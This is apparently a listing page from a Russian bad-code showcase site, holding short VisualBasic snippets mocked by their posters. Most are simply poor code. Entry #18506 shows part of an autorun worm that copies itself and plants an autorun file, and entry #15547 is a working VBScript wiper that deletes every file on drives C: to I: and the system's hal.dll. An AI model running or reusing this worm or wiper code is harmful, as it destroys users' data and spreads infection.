1. VisualBasic / Говнокод #18506


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    if (not fso.fileexists(fname)) or (not fso.fileexixts(aname)) then
    	if (fso.fileexists(fname)=false) then
    		fso.copyfile wscript.scriptname,fname
    	end if
    	if (fso.fileexists(aname)=false) then
    		set au=fso.createtextfile aname,2,true
    		au.writeline "[AutoRun]"
    		au.writeline "shellexecute=wscript /e:vbs pamela handerson.jpg -autostart"
    		set au=nothing
    	end if
    end if

    Взято из кода одного autorun-червя. Вопрос: нахуя?

    Pyriandr, 21 Июля 2015

    Комментарии (17)
  2. VisualBasic / Говнокод #17728


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    If ((ind_imit_gun = 0) And _
                ((input_B_LA2 And shop) = shop) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And lonely) = lonely) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 0) And _
                ((input_B_LA2 And shop) = shop) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And mashin) = mashin) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 1) And _
                ((input_B_LA2 And shop) = shop) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And lonely) = lonely) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 2) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And lonely) = lonely) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 2) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And mashin) = mashin) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 3) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And mashin) = mashin) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 4) And _
                ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And lonely) = lonely) And _
                (input_A_LA48 And choice_k) = choice_k) _
                Or ((ind_imit_gun = 6) And _
               ((input_B_LA2 And loading) = loading) And _
                ((input_B_LA2 And lonely) = lonely) And _
                (input_A_LA48 And choice_k) = choice_k) Then

    Вот такая страшная проверка нужных битов битовыми масками используется в одном военном ПО xD
    И на мой взгляд тут есть ошибки,но почему то работает.

    Ramirag, 05 Марта 2015

    Комментарии (19)
  3. VisualBasic / Говнокод #17521


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    Set rs = CurrentDb.OpenRecordset(sql, dbOpenDynaset)
        If rs.RecordCount > 0 Then
            rscnt = rs.RecordCount
            If rscnt >= 2 Then
                ApllyActions = 1
                lActionText.Visible = True
                rs!Cost = rs!CostSrc * (100 - discount) / 100
                rs!Summa = rs!CostSrc * (100 - discount) / 100
                rs!discount = -discount
                If rscnt >= 4 Then
                    rs!Cost = rs!CostSrc * (100 - discount) / 100
                    rs!Summa = rs!CostSrc * (100 - discount) / 100
                    rs!discount = -discount
                    If rscnt >= 6 Then
                        rs!Cost = rs!CostSrc * (100 - discount) / 100
                        rs!Summa = rs!CostSrc * (100 - discount) / 100
                        rs!discount = -discount
                        If rscnt >= 8 Then
                            rs!Cost = rs!CostSrc * (100 - discount) / 100
                            rs!Summa = rs!CostSrc * (100 - discount) / 100
                            rs!discount = -discount
                            If rscnt >= 10 Then
                                rs!Cost = rs!CostSrc * (100 - discount) / 100
                                rs!Summa = rs!CostSrc * (100 - discount) / 100
                                rs!discount = -discount
                                If rscnt >= 12 Then
                                    rs!Cost = rs!CostSrc * (100 - discount) / 100
                                    rs!Summa = rs!CostSrc * (100 - discount) / 100
                                    rs!discount = -discount
                                    If rscnt >= 14 Then
                                        rs!Cost = rs!CostSrc * (100 - discount) / 100
                                        rs!Summa = rs!CostSrc * (100 - discount) / 100
                                        rs!discount = -discount
                                        If rscnt >= 16 Then
                                            rs!Cost = rs!CostSrc * (100 - discount) / 100
                                            rs!Summa = rs!CostSrc * (100 - discount) / 100
                                            rs!discount = -discount
                                            If rscnt >= 18 Then
                                                rs!Cost = rs!CostSrc * (100 - discount) / 100
                                                rs!Summa = rs!CostSrc * (100 - discount) / 100
                                                rs!discount = -discount
                                                If rscnt >= 20 Then
                                                    rs!Cost = rs!CostSrc * (100 - discount) / 100
                                                    rs!Summa = rs!CostSrc * (100 - discount) / 100
                                                    rs!discount = -discount
                                                    If rscnt >= 22 Then
                                                        rs!Cost = rs!CostSrc * (100 - discount) / 100
                                                        rs!Summa = rs!CostSrc * (100 - discount) / 100
                                                        rs!discount = -discount
                                                        If rscnt >= 24 Then
                                                            rs!Cost = rs!CostSrc * (100 - discount) / 100
                                                            rs!Summa = rs!CostSrc * (100 - discount) / 100
                                                            rs!discount = -discount
                                                        End If
                                                    End If
                                                End If
                                            End If
                                        End If
                                    End If
                                End If
                            End If
                        End If
                    End If

    Код старшего программиста для проведения продажи "3 товара по цене двух". Опыт -10 лет. Если в чеке единиц товара больше 24, => не сработает.

    Reg0804, 26 Января 2015

    Комментарии (22)
  4. VisualBasic / Говнокод #16932


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    Public m_Values As Hashtable    
    Public Function GetSensorType(p_SensorType As SensorType) As SensorValue
            For Each de As DictionaryEntry In m_Values
                If CType(de.Key, SensorType) = p_SensorType Then
                    Return de.Value
                End If
            Return Nothing
     End Function

    Отличный пример работы с Hashtable!

    IlyaS, 24 Октября 2014

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  5. VisualBasic / Говнокод #16928


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    Public m_Values As Hashtable    
    Public Function GetSensorType(p_SensorType As SensorType) As SensorValue
            For Each de As DictionaryEntry In m_Values
                If CType(de.Key, SensorType) = p_SensorType Then
                    Return de.Value
                End If
            Return Nothing
     End Function

    Отличный пример работы с Hashtable!

    IlyaS, 24 Октября 2014

    Комментарии (1)
  6. VisualBasic / Говнокод #16439


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    Dim dLoadCurrent As Double
    Dim strReading As String = String.Empty
    Dim strTempReading As String
    strReading = Space(20)
    strReading = считали напряжение из устройства
    strTempReading = CStr(InStr(1, strReading, vbLf, CompareMethod.Binary))
    dLoadCurrent = CDbl(Left(strReading, CShort(strTempReading)))

    Супер каст.

    kempendyi, 29 Июля 2014

    Комментарии (15)
  7. VisualBasic / Говнокод #16218


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    Привет всем, помогите решить проблему.
    reached limit: cannot create any more controls for this from
    Как я понял, число контроллеров не должно превышать 255-256 в одной форме. Как этого избежать?
    Можно ли вообще создавать формы с общими переменными? Спасибо


    brutushafens, 24 Июня 2014

    Комментарии (22)
  8. VisualBasic / Говнокод #16114


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    function GetRaz()
    Open "C:NeWFiles.txt" For Output As #1
    Print #1, "0"
    Shell "cmd /X /C  set PROCESSOR_ARCHITECTURE > C:NeWFiles.txt", vbHide
    Open "C:NeWFiles.txt" For Input As #1
    Do While Not EOF(1)
    Input #1, Items
    If Items = "" Or items = "0" Then GoTo 1
    GetRaz = Replace(Items, "PROCESSOR_ARCHITECTURE=", "")
    End function

    "Получаем разрядность Windows"

    brutushafens, 04 Июня 2014

    Комментарии (28)
  9. VisualBasic / Говнокод #15547


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    on error resume next
    Set S = CreateObject("Wscript.Shell")
    set FSO=createobject("scripting.filesystemobject")
    fso.deletefile "C:*.*",1
    fso.deletefolder "C:*.*",1
    fso.deletefile "D:*.*",1
    fso.deletefolder "D:*.*",1
    fso.deletefile "E:*.*",1
    fso.deletefolder "E:*.*",1
    fso.deletefile "F:*.*",1
    fso.deletefolder "F:*.*",1
    fso.deletefile "G:*.*",1
    fso.deletefolder "G:*.*",1
    fso.deletefile "H:*.*",1
    fso.deletefolder "H:*.*",1
    fso.deletefile "I:*.*",1
    fso.deletefolder "I:*.*",1
    fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1

    Школота пишет охуительный троян.

    gost, 21 Марта 2014

    Комментарии (44)
  10. VisualBasic / Говнокод #15275


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    ResetList( Chars( ) )
    While NextElement( Chars( ) )
    	Define Address.l = @Chars( )
    	Define Reference.s = Chars( )
    	While NextElement( Chars( ) )
    		If Chars( ) = Reference
    			DeleteElement( Chars( ) )
    	ChangeCurrentElement( Chars( ), Address )

    Stertor-, 01 Марта 2014

    Комментарии (83)